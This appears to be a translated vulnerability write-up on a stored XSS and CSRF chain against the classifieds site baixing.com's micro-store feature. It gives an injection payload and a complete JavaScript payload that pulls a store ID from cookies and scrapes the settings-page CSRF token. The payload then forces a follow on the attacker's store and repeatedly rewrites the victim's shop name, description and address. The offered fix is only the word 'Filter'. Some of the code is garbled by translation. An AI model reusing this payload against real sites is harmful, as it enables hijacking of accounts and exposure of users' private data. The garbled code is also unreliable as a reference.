People Network Storage XSS + CSRF can obtain user privacy and change store data (problems exist on the main site and all local sub-sites)

People Network Storage XSS + CSRF can obtain user privacy and change store data (problems exist on the main site and all local sub-sites)

First of all, the problem is that although the title of a post is limited to 25 characters without filtering characters, there are also various positions for XSS!

Payload: '"> <script src = //?.?> /*
 

Although the title is filtered out, you can still see that the output in other places is not filtered when you open the source file!
 

We can see that our code is successfully loaded here, but we haven't reached the WWW domain of the main site yet. Some important operation tokens are placed in the WWW domain.

After testing, we found that when you open a micro-store, all your posts will also appear in the micro-store, and the micro-store is in the WWW domain.

Let's see if our Payload is filtered out in the microstore.

First open my micro-store:
 

If some content is not loaded, the problem may occur. Then open the source code:
 

We can see that although several items are filtered out, there are many output points and some of them are not filtered, so we now have another XSS In the WWW domain.

So what can we do now?
 

You can see that there are many important operations in WWW. BAIXING. COM.

Including store settings, issued positions, received resumes, and account details!

So can we use csrf to tamper with data and obtain data? The answer is yes. (The premise is that you want to get the operation token )!

Let's start by changing the shop settings. First, set your own store to capture the package:
 

We can see that the place in the red box is our shop name, shop description and shop address. The token and store id are not displayed in the red box!

If we want to change the store settings, the token and store id are required. How can we get them?

First, I found that the store id is in the cookie and we can get it without httponly.
 

How can we get him?
 

if(document.cookie.indexOf("__u=")>0){ var zhengze =/__u=\d*;/;var cookie=document.cookie;WeiDianId = String(zhengze.exec(cookie)).replace("__u=","").replace(";",""); }

If the cookie contains the cookie _ u, it is obtained by using a regular expression, converted to the String type, and then removed _ u = "and" The rest is the store ID.

Now the key store ID is obtained, and the rest is another key Token.

First, go to the settings page to open the source file and directly search for the token:
 

We can see that the token is put in a hidden input, but it's okay. Now let's get it!
 

function Connection(Sendtype,url,content,callback){if (window.XMLHttpRequest){var xmlhttp=new XMLHttpRequest();}else{var xmlhttp=new ActiveXObject("Microsoft.XMLHTTP");} xmlhttp.onreadystatechange=function(){if(xmlhttp.readyState==4&&xmlhttp.status==200){callback(xmlhttp.responseText);}}xmlhttp.open(Sendtype,url,true);xmlhttp.setRequestHeader("Content-Type","application/x-www-form-urlencoded");xmlhttp.send(content);}Connection("GET","http://www.baixing.com/w/weishop/set","",function(callback){var zhengze = /value="\w{32}"/;SendToken = String(zhengze.exec(callback)).replace('value="','').replace('"','');});

First create an ajax function, then use the GET method to request the settings page, and then set the callback function. If there is a return value, then use regular expression matching or GET, then convert the String type to remove value = "and" The rest is the token!

Well, all of these are obtained. Now we start to write payload:
 

Var WeiDianId = ""; var SendToken = ""; // create the AJAX function Connection (Sendtype, url, content, callback) {if (window. XMLHttpRequest) {var xmlhttp = new XMLHttpRequest ();} else {var xmlhttp = new ActiveXObject ("Microsoft. XMLHTTP ");} xmlhttp. onreadystatechange = function () {if (xmlhttp. readyState = 4 & xmlhttp. status = 200) {callback (xmlhttp. responseText) ;}} xmlhttp. open (Sendtype, url, true); xmlhttp. setRequestHeader ("Content-Type", "application/x-www-form-urlencoded"); xmlhttp. send (content);} // get store IDif (document. cookie. indexOf ("_ u =")> 0) {var zhengze =/_ u = \ d *;/; var cookie = document. cookie; WeiDianId = String(zhengze.exe c (cookie )). replace ("_ u = ",""). replace (";", "") ;}// GET tokenConnection ("GET "," http://www.baixing.com/w/weishop/set "," ", Function (callback) {var zhengze =/value =" \ w {32} "/; SendToken = String(zhengze.exe c (callback )). replace ('value = "',''). replace ('"','') ;}); // force the user to pay attention to our store var weidian = new Image (); weidian. src =" http://www.baixing.com/weishop/weishopFav?masterId=u112955608&visitorId=112955608 "; // Change the function SetWeiDian () {if (WeiDianId! = "" & SendToken! = "") {Connection ("POST "," http://www.baixing.com/weishop/updateWeiShopInfo "," ShopName = 0x_Jin & image % 5B % 5D = & desc = 0x_Jin & address = 0x_Jin & token = "+ SendToken +" & showPhone = 1 & id = "+ WeiDianId, function (callback) {}) ;}// after loading the page, perform the following operations every five seconds to change the shop settings setInterval ('setweidian () ', 500 );

This is our final Payload, which has such functions. CSRF adds store attention, obtains store IDs, tokens, and changes shop settings.

Now let's look at the effect.

We did not pay attention to our stores:
 

After XSS is triggered:
 

The store settings are as follows:
 

After XSS is triggered:
 

Let's take a look at the sent data packets:
 

We can see that all the packages for changing the store settings are executed once every 0.5 seconds.

Why, because you don't know how long it will take for the client to get a token, and then I will execute it every 0.5 seconds!

Note that the setting is not changed every five seconds but 0.5 seconds .. It's easy to change it!

 

Solution:

Filter